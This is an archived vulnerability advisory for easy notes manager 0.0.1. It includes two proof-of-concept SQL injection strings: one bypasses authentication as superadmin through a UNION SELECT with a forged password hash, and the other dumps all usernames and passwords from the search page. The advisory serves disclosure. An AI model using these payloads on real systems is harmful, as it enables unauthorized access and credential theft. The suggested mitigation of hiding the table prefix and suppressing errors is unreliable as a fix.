TUCoPS :: HP Unsorted E :: b06-5482.htm

easy notes manager sql injection and authentication bypass
easy notes manager sql injection and authentication bypass
easy notes manager sql injection and authentication bypass


easy notes manager (eNM) version 0.0.1, available at http://217.172.179.216/evandor/html/index.php?id=103 is affected by multiple sql injection vulnerability due to a missing check of the user supplied input. 
An attacker can bypass the authentication procedure and get a full dump of the database tables.



No patches are availble but a possible solution is change the TABLEPREFIX variable in config file with a very random one and suppress all error messages (and eventually downgrade mysql5 to mysql4).
The vendor has been warned.


proof of concept to bypass authentication:
username: dontcare' and 0=1 union select id,login,'0cc175b9c0f1b6a831c399e269772661',grp,salutation,firstname,lastname,email from users where login='superadmin
password: a

proof of concept to get a list of all users and passwords:
go to search page and search for: "dontcare')) union select 0,login,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from users -- "

cheers
-p

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH